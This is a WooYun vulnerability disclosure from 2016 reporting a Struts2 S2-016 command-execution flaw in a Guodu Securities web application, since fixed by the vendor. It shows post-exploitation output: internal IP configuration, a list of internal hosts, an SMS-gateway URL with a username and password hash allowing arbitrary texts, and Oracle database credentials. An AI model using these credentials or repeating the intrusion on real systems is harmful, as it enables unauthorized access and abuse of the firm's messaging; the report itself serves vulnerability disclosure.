当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204861

漏洞标题:国都证券某某处命令执行(可内网/可用短信平台发送任意短信)

相关厂商:国都证券

漏洞作者: 路人甲

提交时间:2016-05-04 12:13

修复时间:2016-05-10 13:24

公开时间:2016-05-10 13:24

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-10: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

http://wx.guodu.com/ tomcat
拿出神器扫到了mic目录
一顿 admin XXXXX 各种尝试没成功,抓了包看到了下面验证连接
http://211.144.149.2/mic/admin/check.action 嗯继续神器 S2-016
webpath:C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\mic\
whoami:2003server\administrator
shell

1.PNG


Windows IP Configuration
Host Name . . . . . . . . . . . . : 2003server
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : HP NC373i Multifunction Gigabit Server Adapter
Physical Address. . . . . . . . . : 00-19-BB-2D-5C-34
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.7.94
Subnet Mask . . . . . . . . . . . : 255.255.255.192
Default Gateway . . . . . . . . . : 192.168.7.126
DNS Servers . . . . . . . . . . . : 202.106.0.20
Ethernet adapter 本地连接 2:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : HP NC373i Multifunction Gigabit Server Adapter #2
Physical Address. . . . . . . . . : 00-19-BB-2D-BB-6A
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.7.24
Subnet Mask . . . . . . . . . . . : 255.255.255.224
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : 8.8.8.8


\\2003SERVER                                                                   
\\GDZQ-7651EBDFE8
\\GDZQ-795E336EDB
\\HP360G9
\\HPDL360
\\HX-SAMBA Samba Server
\\MESSAGER messager
\\WIN-066GPLR88JU
\\WIN-0A0MPF8TMEU
\\WIN-FSHV3DDVUO6
\\WIN-IN628LJA7CS
\\WIN-J37A7RH28GL
\\WIN-MFSE1E83RLD
\\WIN-ODNVU8TOBF0
\\WIN-P18OAFJNR2I
\\WINDOWS-H3D8UMJ
\\WINDOWS-J8IU964
\\WINDOWS-M6JG4FA
\\WINDOWS-NVUC7Q8
\\WSJYZX


短信平台

mask 区域
1.://**.**.**//211.144.149.1/smsSendServlet.htmcommand=sendSMSMD5&incode=UTF-8&rstype=text&username=wskh&pwd=7D99874519704FB23F227EC8F5D616AD_
**********
***** ws*****

登陆后可随意发送短信

0504_1.jpg


<T>XDB</T> 
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:@192.168.7.130:1521
weixin
weixin
gdappdb
</X>


数据库就不看了

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-05-04 13:00

厂商回复:

确认漏洞,正组织修复

最新状态:

2016-05-10:漏洞已修复